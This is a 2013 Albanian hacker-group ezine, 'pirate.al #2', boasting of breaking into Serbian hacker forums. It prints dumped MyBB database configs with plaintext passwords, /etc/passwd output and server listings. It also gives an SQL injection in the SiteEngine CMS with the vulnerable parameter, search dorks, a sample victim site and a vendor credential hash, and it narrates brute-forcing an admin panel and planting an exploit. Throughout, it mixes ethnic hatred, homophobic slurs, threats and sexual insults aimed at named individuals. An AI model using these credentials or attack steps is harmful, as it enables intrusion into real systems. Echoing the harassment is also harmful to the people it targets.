Copy Link
Add to Bookmark
Report

pirate.al #2

eZine's profile picture
Published in 
pirate al
 · 7 months ago

__________._____________    ___________________________       _____  .____ 
\______ \ \______ \ / _ \__ ___/\_ _____/ / _ \ | |
| ___/ || _/ / /_\ \| | | __)_ / /_\ \| |
| | | || | \/ | \ | | \ / | \ |___ albanian sites wont be disclosured
|____| |___||____|_ /\____|__ /____| /_______ / /\ \____|__ /_______ \
\/ \/ \/ \/ \/ \/

= [[[ Aint no pussy made where we came from ]]] =
=[[[ SACRED LEGION ]]]=
[ Issue 2 ]


pirate.al was simply formed to fix up the Albanian scene, not to overcome it,
but now we turned out to be more then just scene adjusters, and we will.


- ..The saga of pirate.al and the round table team mates.. -
how we found ourselfs as the defenders,avengers
of the scene and our people.
(will take place on the next issue)

---------------------------------------------------------------------
First of all, a big welcome to the pirate.al team for jud0.A big,huge
ugly,nasty,dirty fuck goes to everyone who hates pirate.al & the way
we act.We will keep improving,being underground,getting new talented
members to our team. ->
---------------------------------------------------------------------

Greetings the precious ones, it's been a long since our last issue.
The last time our story was centered on a battle against our own kind
in order to make things right for the albanian scene.We had to deal with
shit people.Thanks to god, thats over, and it worked out.
We are not working to prevent attacks on the albanians,but undoubtedly avenging them.
A lot of interesting projects are going to crack on, projects who we
would not have been able to develop without the help of our maskmans.


A message to all anti albanians, we may not look great for now,but we
are led by a purpose,courage,confidence,causing enemies to team up against
you,you never know when we strike nor how we strike,we will just be like a
pack of merciless wolves who will haunt you down till the end,once you bled
in,there wont be a back-ticket.

For now we are racing against the time,so we gotta be off,pirate.al security
is not goin to depend on our knowledge until the day we return!aint going to
check for vulnerabilities till then.

¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯
----------------------------------------------
<< i have linux, i am hacker,i have my own email
<< i have alien intelligece, i code, i exploit I HACK THE PLANET
_____ --<<______________________________________________
___/ \___
`-._) (_,-`
\O _ O/
teslateam.org \ - / x0rg.org
`-(
|| Hodman
_||_
|-..-|
|/. \|
|\__/|
._|//\\|_,
`-(( ))-'
__\\//__
>_ /\ _<,
' '

Yuhuu received signal SIGSEGV, Segmentation fault.
0xfuxsrbia ?? ()


* ) ( * )
` ) /( ( )\ )` ) /( ( ) )
( )(_))))\( ((_| /( ( )(_))))\( /( (
(_(_())/((_)\ _ )(_)|_(_())/((_)(_)) )\ '
|_ _(_))((_) ((_)_|_ _(_))((_)_ _((_))
| | / -_|_-< / _` | | | / -_) _` | ' \() teslateam.org ( Serbian "Hackers")
|_| \___/__/_\__,_| |_| \___\__,_|_|_|_| owned within 2-3 minutes


While we were at the zoo we noticed that some like-rebel monkeys were screaming "TESLA TEAM TESLA TEAM TESLA TEAM, SERBIA SERBIA"

)\\\ KABOOM.
_____ |__/
/ \ / /
|_______/ /
)OO )\\ /
(_ // /
dafuq O___/ /
___...."""" / .-.|/ __
__...---"""" _ |/ /| """---...___
,//) / / |
) / / / |
SERBIA SERBIA / / / / |
_,^^,/ / /__/____|
(G,66<_/ / \ |
_/\_,_) _ \\\(| |
/ _ \ ,' ) /| |
/ /"\ \/ ,_\ / \ \
__(,/ > e ) / (_\.oO \ \ \
\_ / ( -,_/ \_/ \ \ \
U \_, _) /___|_____\
( / _/ _/ \
>/ (____(_____|
(.oO


Whos is Teslateam?
- koew.haxor, nem15, skag, Xermes, th3 h4ck3r, furyan, EsC, StRoNiX, sl33p3r, dOOmwalker, an1maL, TeslaH4cker .


StRoNiX : Once upon the time, stronix mother was a prostitue and there was a man who had three cocks and loved
to fuck womens in every hole,everyday I kept sayin to this boy "dont be a prick,cover ur dick",but :
hey i just fucked you,
and this is crazy,
but i didn't use condom,
so you're pregnant maybe.
then it just boomed out a serbian gowk who suffers from urinary tract so he cant bam bam,he was
rapped hard from the UCK army. Now he got married with a friend of his mom,he holds penalties for
getting dicked 10 times a day,he's a CCCCCONDOM BREAKER, of course he's ass are too lackey.

Xermes : A month ago he got a brain transplant unfortunatly the brain rejected him, the only option was
to take a blonde brain, later he got hit by a parked car and felt in a deep coma.

koew.haxor : Known as the BigHead dummy, he went to the doctors to examine his head,but they found
nothin on it so there was no cure for him.

EsC : Single, his relationship got ruined because his dick was so small, so his girlfriend couldnt
know if its in yet, but okay its not his fault, the doctors cut it while he was fabricated.
There is a salvation for him, if he want to make the impossible to a possbile(to get a women),he
needs to win in the next olympics as the "person with the smallest & useless dick".


We are working on discovering the others informations, will be a bit harder, 'cause they are moved in a secret place for childs with mental disabilities,
these ones were found at an orphanage, and adopted by faggots & criminals.
You stand for Serbia? its said when u stand for nothin u will fall for anything, and serbia's actually nothin
"You were looking good from afar.. now you're far from looking good."
media <--------> us


Thank you for the 0day but its useless, so lets share your funny discovery with the public.

FUNNY ==================== 0day0day0day0day0day ====================
koew says : Hi, i found a new 0day and wanted to share it with you.
CMS Name: SiteEngine
Type of vulnerability: SQL Injection
Affected versions : 2.0.5 => 2.0.6
Vendor : Symetric Productions Inc
WebSite of vendor: www.symetricproductions.com
Vendors username/password: support@spcan.com:6c1abb3fa641463640d45c4432095306
Example of site with CMS: http://www.cell-nett.com
Admin page: /admin/
Vuln plugin link : [www.cell-nett.com]/shared/mods/BannerPF/go.php?_b=[SQLi]

Dork/s inurl:shared/mods/BannerPF/go.php?_b=
intext:Designed by Symetric Productions Inc
FUNNY ==================== 0day0day0day0day0day ====================


w0t ab0u7 7h315 l1tt3 53cur171?n0t 601n6 70 74lk 4n17h1n6,t1m3 w4571n6.
$uname -a
Linux server2.Hostding.biz 2.6.32-042stab053.5 #1 SMP Tue Mar 27 11:42:17 MSD 2012 x86_64 x86_64 x86_64 GNU/Linux

$cat /etc/passwd | grep tesla
teslate1:x:708:708::/home/teslate1:/usr/local/cpanel/bin/noshell

$cat config.php

<?php
/**
* Database configuration
*
* Please see the MyBB Wiki for advanced
* database configuration for larger installations
* http://wiki.mybb.com/
*/

$config['database']['type'] = 'mysqli';
$config['database']['database'] = 'teslate1_skag';
$config['database']['table_prefix'] = 'mybb_';

$config['database']['hostname'] = 'localhost';
$config['database']['username'] = 'teslate1_skag';
$config['database']['password'] = 'wallhack1';

/**
* Admin CP directory
* For security reasons, it is recommended you
* rename your Admin CP directory. You then need
* to adjust the value below to point to the
* new directory.
*/

$config['admin_dir'] = 'admin';

/**
* Hide all Admin CP links
* If you wish to hide all Admin CP links
* on the front end of the board after
* renaming your Admin CP directory, set this
* to 1.
*/

$config['hide_admin_links'] = 0;

/**
* Data-cache configuration
* The data cache is a temporary cache
* of the most commonly accessed data in MyBB.
* By default, the database is used to store this data.
*
* If you wish to use the file system (cache/ directory), MemCache, xcache, or eAccelerator
* you can change the value below to 'files', 'memcache', 'xcache' or 'eaccelerator' from 'db'.
*/

$config['cache_store'] = 'db';

/**
* Memcache configuration
* If you are using memcache as your data-cache,
* you need to configure the hostname and port
* of your memcache server below.
*
* If not using memcache, ignore this section.
*/

$config['memcache']['host'] = 'localhost';
$config['memcache']['port'] = 11211;

/**
* Super Administrators
* A comma separated list of user IDs who cannot
* be edited, deleted or banned in the Admin CP.
* The administrator permissions for these users
* cannot be altered either.
*/

$config['super_admins'] = '1';

/**
* Database Encoding
* If you wish to set an encoding for MyBB uncomment
* the line below (if it isn't already) and change
* the current value to the mysql charset:
* http://dev.mysql.com/doc/refman/5.1/en/charset-mysql.html
*/

$config['database']['encoding'] = 'utf8';

/**
* Automatic Log Pruning
* The MyBB task system can automatically prune
* various log files created by MyBB.
* To enable this functionality for the logs below, set the
* the number of days before each log should be pruned.
* If you set the value to 0, the logs will not be pruned.
*/

$config['log_pruning'] = array(
'admin_logs' => 365, // Administrator logs
'mod_logs' => 365, // Moderator logs
'task_logs' => 30, // Scheduled task logs
'mail_logs' => 180, // Mail error logs
'user_mail_logs' => 180, // User mail logs
'promotion_logs' => 180 // Promotion logs
);

?>

__,__
.--. .-" "-. .--.
/ .. \/ .-. .-. \/ .. \
| | '| / Y \ |' | |
| \ \ \ 0 | 0 / / / |
\ '- ,\.-"`` ``"-./, -' /
`'-' /_ ^ ^ _\ '-'` fuckserbiafuckserbiafuckserbiafuckserbiafuckserbia
.--'| \._ _ _./ |'--.
/` \ \.-. / / `\
/ '._/ |-' _.' \
/ ; /--~' | \
/ .'\|.-\--. \ \
/ .'-. /.-.;\ |\|'~'-.|\ \
\ `-./`|_\_/ ` `\'. \
'. ; ___) '.`; /
'-.,_ ; ___) \/ /
\ ``'------'\ \ ` /
'. \ '. | ;/_
___> '. \_ _ _/ , '--.
.' '. .-~~~~~-. / |--'`~~-. \
// / .---'/ .-~~-._/ / / /---..__.' /
((_(_/ / / (_(_(_(---.__ .'
| | _ `~~`
| | \'.
\ '....' |
'.,___.'

) ( ( (
( /( ( )( )\))(
)\()) )\ (()\ ((_))\
((_)\ ((_) ((_) (()(_)
\ \ // _ \| '_|/ _` | x0rg.org (SERBO-BOSNIAN HACKERS)
/_\_\\___/|_| \__, | owned within seconds
|___/

/
/ .'
/ .'
/ ______. .'
/ / __/_// ' OWOWOWOWOOWOWW
/ / / @"@ OWOWOWOWOWOWOWOW
/ \ G ' >' OWOWOWOWOWOWOWO _.-'
/ \/. C ' OWOWOWOWOW _.-'
/ .---\ / --. _.-'
/ / \( \ _.-' HOLY GOD
/ / \ \ (. ) ' MAKE THEM STOP
/ / /\ \ /
/ \ | \ \ __..--''
/ .' \_\ ) )\\ __..--''
/ .' ) \ | / \ -''
/ .' _ '///` ( /\ \
/.' _.-' __ / ) ) )
'.-'..--'' / ,' / /
.__---------- /__./ / / --------------------a:f
``--.. __// / ) / Storm
/ _J) /)`-\
`-__/-' ` \\ |(
`\ \ -..__
`--' ``--..__
``--
Storm was an annoying boy,faggot,thief,dreamer, he got arrested for stealing a free sample, and after an year again for
jerking on his house window. After all this problems with her son his mom now needs at last four cocks to get loaded.
TWO YEARS LATER
He got hacked by albanins, he's life just ended, no sex anymore,no marriage! What does Storm now? Walks into a bar in Beograd,
orders five beers for the first round and so on for the second. Storm was and is a special specie found on the crap of amazonia.

The doctors said that x0rg is allergic to 53cur17y.

$pwd
/home/fsvkql43/public_html/

$ls -la


total 1088
drwxr-xr-x 10 fsvkql43 nobody 4096 Aug 7 21:24 .
drwx--x--x 11 fsvkql43 fsvkql43 4096 Aug 10 21:17 ..
-rw------- 1 fsvkql43 fsvkql43 13 Aug 7 00:52 .ftpquota
-rw-r--r-- 1 fsvkql43 fsvkql43 2684 Aug 6 00:58 .htaccess
drwxr-xr-x 7 fsvkql43 fsvkql43 4096 Aug 3 14:37 admin
-rw-r--r-- 1 fsvkql43 fsvkql43 3461 Aug 3 14:37 announcements.php
drwxr-xr-x 2 fsvkql43 fsvkql43 4096 Aug 3 14:38 archive
-rw-r--r-- 1 fsvkql43 fsvkql43 3676 Aug 3 14:37 attachment.php
drwxrwxrwx 3 fsvkql43 fsvkql43 4096 Aug 3 14:42 cache
-rw-r--r-- 1 fsvkql43 fsvkql43 67069 Aug 3 14:37 calendar.php
-rw-r--r-- 1 fsvkql43 fsvkql43 7438 Aug 3 14:37 captcha.php
-rw-r--r-- 1 fsvkql43 fsvkql43 636 Aug 3 14:37 css.php
-rw-r--r-- 1 fsvkql43 fsvkql43 19497 Aug 3 14:37 editpost.php
-rw-r--r-- 1 fsvkql43 fsvkql43 15934 Aug 13 08:53 error_log
-rw-r--r-- 1 fsvkql43 fsvkql43 1150 Aug 7 21:24 favicon.ico
-rw-r--r-- 1 fsvkql43 fsvkql43 34074 Aug 3 14:37 forumdisplay.php
-rw-r--r-- 1 fsvkql43 fsvkql43 20882 Aug 6 14:53 global.php
-rw-r--r-- 1 fsvkql43 fsvkql43 53 Aug 7 10:28 google3202fc782c35691f.html
drwxr-xr-x 17 fsvkql43 fsvkql43 4096 Aug 10 21:18 images
drwxr-xr-x 10 fsvkql43 fsvkql43 4096 Aug 5 09:14 inc
-rw-r--r-- 1 fsvkql43 fsvkql43 11035 Aug 3 14:37 index.php
drwxr-xr-x 4 fsvkql43 fsvkql43 4096 Aug 3 14:45 install
drwxr-xr-x 5 fsvkql43 fsvkql43 4096 Aug 6 01:06 jscripts
-rw-r--r-- 1 fsvkql43 fsvkql43 9104 Aug 3 14:37 managegroup.php
-rw-r--r-- 1 fsvkql43 fsvkql43 66439 Aug 3 14:37 member.php
-rw-r--r-- 1 fsvkql43 fsvkql43 10414 Aug 6 19:51 memberlist.php
-rw-r--r-- 1 fsvkql43 fsvkql43 20181 Aug 3 14:37 misc.php
-rw-r--r-- 1 fsvkql43 fsvkql43 104502 Aug 3 14:37 modcp.php
-rw-r--r-- 1 fsvkql43 fsvkql43 70013 Aug 3 14:37 moderation.php
-rw-r--r-- 1 fsvkql43 fsvkql43 36662 Aug 3 14:37 newreply.php
-rw-r--r-- 1 fsvkql43 fsvkql43 29766 Aug 3 14:37 newthread.php
-rw-r--r-- 1 fsvkql43 fsvkql43 6779 Aug 3 14:37 online.php
-rw-r--r-- 1 fsvkql43 fsvkql43 24147 Aug 3 14:37 polls.php
-rw-r--r-- 1 fsvkql43 fsvkql43 20924 Aug 3 14:37 portal.php
-rw-r--r-- 1 fsvkql43 fsvkql43 5612 Aug 3 14:37 printthread.php
-rw-r--r-- 1 fsvkql43 fsvkql43 59557 Aug 3 14:37 private.php
-rw-r--r-- 1 fsvkql43 fsvkql43 3536 Aug 3 14:37 ratethread.php
-rw-r--r-- 1 fsvkql43 fsvkql43 5058 Aug 3 14:37 report.php
-rw-r--r-- 1 fsvkql43 fsvkql43 27004 Aug 3 14:37 reputation.php
-rw-r--r-- 1 fsvkql43 fsvkql43 407 Aug 3 14:37 rss.php
-rw-r--r-- 1 fsvkql43 fsvkql43 44810 Aug 6 15:22 search.php
-rw-r--r-- 1 fsvkql43 fsvkql43 4739 Aug 3 14:37 sendthread.php
-rw-r--r-- 1 fsvkql43 fsvkql43 4580 Aug 3 14:37 showteam.php
-rw-r--r-- 1 fsvkql43 fsvkql43 38084 Aug 3 14:37 showthread.php
-rw-r--r-- 1 fsvkql43 fsvkql43 5409 Aug 3 14:37 stats.php
-rw-r--r-- 1 fsvkql43 fsvkql43 5297 Aug 3 14:37 syndication.php
-rw-r--r-- 1 fsvkql43 fsvkql43 1542 Aug 3 14:37 task.php
drwxrwxrwx 3 fsvkql43 fsvkql43 4096 Aug 3 14:42 uploads
-rw-r--r-- 1 fsvkql43 fsvkql43 99204 Aug 3 14:37 usercp.php
-rw-r--r-- 1 fsvkql43 fsvkql43 4720 Aug 3 14:37 usercp2.php
-rw-r--r-- 1 fsvkql43 fsvkql43 35488 Aug 3 14:37 warnings.php
-rw-r--r-- 1 fsvkql43 fsvkql43 22800 Aug 3 14:37 xmlhttp.php


$cd inc
$ls -la

total 936
drwxr-xr-x 10 fsvkql43 fsvkql43 4096 Aug 5 09:14 .
drwxr-xr-x 10 fsvkql43 nobody 4096 Aug 7 21:24 ..
drwxr-xr-x 3 fsvkql43 fsvkql43 4096 Aug 3 14:39 3rdparty
-rw-r--r-- 1 fsvkql43 fsvkql43 3440 Aug 3 14:39 adminfunctions_templates.php
drwxr-xr-x 2 fsvkql43 fsvkql43 4096 Aug 3 14:39 cachehandlers
drwxr-xr-x 2 fsvkql43 fsvkql43 4096 Aug 3 14:39 captcha_fonts
-rw-r--r-- 1 fsvkql43 fsvkql43 439 Aug 3 14:39 class_bitwise.php
-rw-r--r-- 1 fsvkql43 fsvkql43 8362 Aug 3 14:39 class_captcha.php
-rw-r--r-- 1 fsvkql43 fsvkql43 9250 Aug 3 14:39 class_core.php
-rw-r--r-- 1 fsvkql43 fsvkql43 12131 Aug 3 14:39 class_custommoderation.php
-rw-r--r-- 1 fsvkql43 fsvkql43 21268 Aug 3 14:39 class_datacache.php
-rw-r--r-- 1 fsvkql43 fsvkql43 16758 Aug 3 14:39 class_error.php
-rw-r--r-- 1 fsvkql43 fsvkql43 6740 Aug 3 14:39 class_feedgeneration.php
-rw-r--r-- 1 fsvkql43 fsvkql43 5766 Aug 3 14:39 class_feedparser.php
-rw-r--r-- 1 fsvkql43 fsvkql43 8444 Aug 3 14:39 class_graph.php
-rw-r--r-- 1 fsvkql43 fsvkql43 4529 Aug 3 14:39 class_language.php
-rw-r--r-- 1 fsvkql43 fsvkql43 9276 Aug 3 14:39 class_mailhandler.php
-rw-r--r-- 1 fsvkql43 fsvkql43 60895 Aug 3 14:39 class_moderation.php
-rw-r--r-- 1 fsvkql43 fsvkql43 33838 Aug 3 14:39 class_parser.php
-rw-r--r-- 1 fsvkql43 fsvkql43 4121 Aug 3 14:39 class_plugins.php
-rw-r--r-- 1 fsvkql43 fsvkql43 15098 Aug 3 14:39 class_session.php
-rw-r--r-- 1 fsvkql43 fsvkql43 3072 Aug 3 14:39 class_templates.php
-rw-r--r-- 1 fsvkql43 fsvkql43 2052 Aug 3 14:39 class_timers.php
-rw-r--r-- 1 fsvkql43 fsvkql43 3393 Aug 3 14:39 class_xml.php
-rw-r--r-- 1 fsvkql43 fsvkql43 2716 Aug 7 17:29 config.php
-rw-r--r-- 1 fsvkql43 fsvkql43 4083 Aug 3 14:39 datahandler.php
drwxr-xr-x 2 fsvkql43 fsvkql43 4096 Aug 3 14:39 datahandlers
-rw-r--r-- 1 fsvkql43 fsvkql43 30977 Aug 3 14:39 db_mysql.php
-rw-r--r-- 1 fsvkql43 fsvkql43 31183 Aug 3 14:39 db_mysqli.php
-rw-r--r-- 1 fsvkql43 fsvkql43 4468 Aug 3 14:39 db_pdo.php
-rw-r--r-- 1 fsvkql43 fsvkql43 33812 Aug 3 14:39 db_pgsql.php
-rw-r--r-- 1 fsvkql43 fsvkql43 30495 Aug 3 14:39 db_sqlite.php
-rw-r--r-- 1 fsvkql43 fsvkql43 149981 Aug 3 14:39 functions.php
-rw-r--r-- 1 fsvkql43 fsvkql43 6099 Aug 3 14:39 functions_archive.php
-rw-r--r-- 1 fsvkql43 fsvkql43 25815 Aug 3 14:39 functions_calendar.php
-rw-r--r-- 1 fsvkql43 fsvkql43 575 Aug 3 14:39 functions_compat.php
-rw-r--r-- 1 fsvkql43 fsvkql43 635 Aug 5 09:15 functions_deldir.php
-rw-r--r-- 1 fsvkql43 fsvkql43 16791 Aug 3 14:39 functions_forumlist.php
-rw-r--r-- 1 fsvkql43 fsvkql43 6170 Aug 3 14:39 functions_image.php
-rw-r--r-- 1 fsvkql43 fsvkql43 8059 Aug 3 14:39 functions_indicators.php
-rw-r--r-- 1 fsvkql43 fsvkql43 4578 Aug 3 14:39 functions_massmail.php
-rw-r--r-- 1 fsvkql43 fsvkql43 3827 Aug 3 14:39 functions_modcp.php
-rw-r--r-- 1 fsvkql43 fsvkql43 28953 Aug 3 14:39 functions_online.php
-rw-r--r-- 1 fsvkql43 fsvkql43 23819 Aug 3 14:39 functions_post.php
-rw-r--r-- 1 fsvkql43 fsvkql43 6350 Aug 3 14:39 functions_posting.php
-rw-r--r-- 1 fsvkql43 fsvkql43 4109 Aug 3 14:39 functions_rebuild.php
-rw-r--r-- 1 fsvkql43 fsvkql43 35183 Aug 3 14:39 functions_search.php
-rw-r--r-- 1 fsvkql43 fsvkql43 8909 Aug 3 14:39 functions_serverstats.php
-rw-r--r-- 1 fsvkql43 fsvkql43 8594 Aug 3 14:39 functions_task.php
-rw-r--r-- 1 fsvkql43 fsvkql43 23618 Aug 3 14:39 functions_time.php
-rw-r--r-- 1 fsvkql43 fsvkql43 17880 Aug 3 14:39 functions_upload.php
-rw-r--r-- 1 fsvkql43 fsvkql43 14898 Aug 3 14:39 functions_user.php
-rw-r--r-- 1 fsvkql43 fsvkql43 1616 Aug 3 14:39 functions_warnings.php
-rw-r--r-- 1 fsvkql43 fsvkql43 1175 Aug 5 09:15 functions_zip.php
-rw-r--r-- 1 fsvkql43 fsvkql43 67 Aug 3 14:39 index.html
-rw-r--r-- 1 fsvkql43 fsvkql43 8105 Aug 3 14:39 init.php
drwxr-xr-x 4 fsvkql43 fsvkql43 4096 Aug 3 14:57 languages
drwxr-xr-x 2 fsvkql43 fsvkql43 4096 Aug 3 14:39 mailhandlers
-rw-r--r-- 1 fsvkql43 fsvkql43 10984 Aug 3 14:39 mybb_group.php
drwxr-xr-x 3 fsvkql43 fsvkql43 4096 Aug 8 16:11 plugins
-rw-r--r-- 1 fsvkql43 fsvkql43 7903 Aug 8 16:10 settings.php
drwxr-xr-x 2 fsvkql43 fsvkql43 4096 Aug 3 14:39 tasks

$cat config.php


<?php
/**
* Database configuration
*
* Please see the MyBB Wiki for advanced
* database configuration for larger installations
* http://wiki.mybb.com/
*/

$config['database']['type'] = 'mysqli';
$config['database']['database'] = 'fsvkql43_forum';
$config['database']['table_prefix'] = 'x0rg_';

$config['database']['hostname'] = 'localhost';
$config['database']['username'] = 'fsvkql43_forum';
$config['database']['password'] = 'xQ.Tk*(*=W=m';

/**
* Admin CP directory
* For security reasons, it is recommended you
* rename your Admin CP directory. You then need
* to adjust the value below to point to the
* new directory.
*/

$config['admin_dir'] = 'admin';

/**
* Hide all Admin CP links
* If you wish to hide all Admin CP links
* on the front end of the board after
* renaming your Admin CP directory, set this
* to 1.
*/

$config['hide_admin_links'] = 0;

/**
* Data-cache configuration
* The data cache is a temporary cache
* of the most commonly accessed data in MyBB.
* By default, the database is used to store this data.
*
* If you wish to use the file system (cache/ directory), MemCache, xcache, or eAccelerator
* you can change the value below to 'files', 'memcache', 'xcache' or 'eaccelerator' from 'db'.
*/

$config['cache_store'] = 'db';

/**
* Memcache configuration
* If you are using memcache as your data-cache,
* you need to configure the hostname and port
* of your memcache server below.
*
* If not using memcache, ignore this section.
*/

$config['memcache']['host'] = 'localhost';
$config['memcache']['port'] = 11211;

/**
* Super Administrators
* A comma separated list of user IDs who cannot
* be edited, deleted or banned in the Admin CP.
* The administrator permissions for these users
* cannot be altered either.
*/

$config['super_admins'] = '1';

/**
* Database Encoding
* If you wish to set an encoding for MyBB uncomment
* the line below (if it isn't already) and change
* the current value to the mysql charset:
* http://dev.mysql.com...rset-mysql.html
*/

$config['database']['encoding'] = 'utf8';

/**
* Automatic Log Pruning
* The MyBB task system can automatically prune
* various log files created by MyBB.
* To enable this functionality for the logs below, set the
* the number of days before each log should be pruned.
* If you set the value to 0, the logs will not be pruned.
*/

$config['log_pruning'] = array(
'admin_logs' => 365, // Administrator logs
'mod_logs' => 365, // Moderator logs
'task_logs' => 30, // Scheduled task logs
'mail_logs' => 180, // Mail error logs
'user_mail_logs' => 180, // User mail logs
'promotion_logs' => 180 // Promotion logs
);

?>

WE OWNED&EXPOSED U GUYS! FUCK YOU STORM, SERBIAN SHIT!


) (
( /( )\ ) ) )
)\()) ( (()/( ( ( /( ( epic ownage of hodman,
((_)\ )\ ((_)) )\ ' )(_)) )\ ) the private guy.
| |(_) ((_) _| | _((_)) ((_)_ _(_/(
| ' \ / _ \/ _` || ' \()/ _` || ' \))
|_||_|\___/\__,_||_|_|_| \__,_||_||_| part 1


---------------------------
also known as : muki,tronac
---------------------------

Hodman is a little boy who needs to be sent to bed with his soup,
Hodman is a guy who presents himself with a new nickname each time,
Hodman is a private guy, i do black, i earn on black, i am a criminal,
Hodman is a guy who sells fake exploits,malwares,tools etc.
Hodman is a COW!
Hodman is a dick!
Hodman is a failure!
Hodman is a guy who we choiced to mess up with,
Hodman is OWNED!

We are going to keep hodmans site&real identity private, lot of reasons.

Porspective ways of owning hodman, owning hard, owning everything out of him*:

There was a leet security preventing admin panel to be viewed, so we choiced the simplest
way to bypass in, it turned out to work.

67.*******/~****/adminpanel

----------------------
[PASSWORD]
______
(log in)
----------------------
admin
adminpassword
admin1
admin12
admin123
adminpassword1
adminpassword12
adminpassword123
Wrote a simple brute forcer to attack his admin page, heck yea it worked;
[x] Password : adminpassword123 .We collected some informations about his
sytemsm uploaded evil files on his site (java exploit), doing some social
engineering we were able to get a backdoor on his windows vps.Unfortunatly
his vps didnt hold that much of informations, at least we got a ssh user on
ne of his useless(we used to think) server.

[user@server ~]$ pwd
/home/user
[user@server ~]$ ls -la
********
********
********
********
********
server => seemed suspected
********
********
********

[user@server ~]$
Hell no i dont remember the whole story,what we did and what else
I remember is that this file spawned us rootshell.
[user@server ~]$ ./server
------
password:
------
Server was so crepy and allowed us a lot to do :) after dumping
the server file with objdump, we got some funny results,and broke
into his server... let it be "000000", writing what i memorised.
.....
000000 000000 000000 000000 000000 <pass> abc

[user@server ~]$ ./server
password: abc


this just opened our eyes, and helped us owning all his sites,
servers, working center, this will take place on the next issue.


.--.---.
_ |||||||| _
\\\ | |//
\_ \ ./
.--. \ \/ .--.
||||_ /\. `\ _||||
| || ./ /\ \ || |
| / ./ / \ `\ \ |
| | / / `\ \ \ |
.--. | | / ./ ___ \ \ | | .--.
//| \ | | | |.-'''\``\\ | | | / |\\
\\\| \ | | | / __|__| | | | / ///
``\ \ | | | `. / \ | | | / /''
\ \ ` \ | |(\/ o o | | / ' / .'
` ` \ \ | |`\ u | | ./ / / /
\ `_ \ `\ \ \ -- / |/ / / /
\ `---.\ \ \/`-._/\ // / _/ /
\_ ` _- / ` .- .-----' /
`---.___ /' \ /
./ \------' PIRATE.AL
/ .-'| |/\ \
_./ /' / \ `\ `-.
__.-' /' | o | \ o | `\ `-._
____.--' __.-' \____/ \___/ `_._ `--._____
/===.____.---' | | `----.____===\
\ /
| |
/ \
| |
/ \ __.-----.__
____-- -' ___. )
_.-' \ / _-' /
./ _.-_._ __/-./--' _.-'
( `-.______ ___.--'/
\_ `---' ___/'
`--._______.---------:F_P:'

@2013, EZINE 2 ( PIRATEL SECOND "GREAT RELEASE" )
STRONGLY RECOMENDED TO REMEMBER : WE'LL BE BACK , IF ANY EZINE NEEDED :)

← previous
loading
sending ...
New to Neperos ? Sign Up for free
download Neperos App from Google Play
install Neperos as PWA

Let's discover also

Recent Articles

Recent Comments

Neperos cookies
This website uses cookies to store your preferences and improve the service. Cookies authorization will allow me and / or my partners to process personal data such as browsing behaviour.

By pressing OK you agree to the Terms of Service and acknowledge the Privacy Policy

By pressing REJECT you will be able to continue to use Neperos (like read articles or write comments) but some important cookies will not be set. This may affect certain features and functions of the platform.
OK
REJECT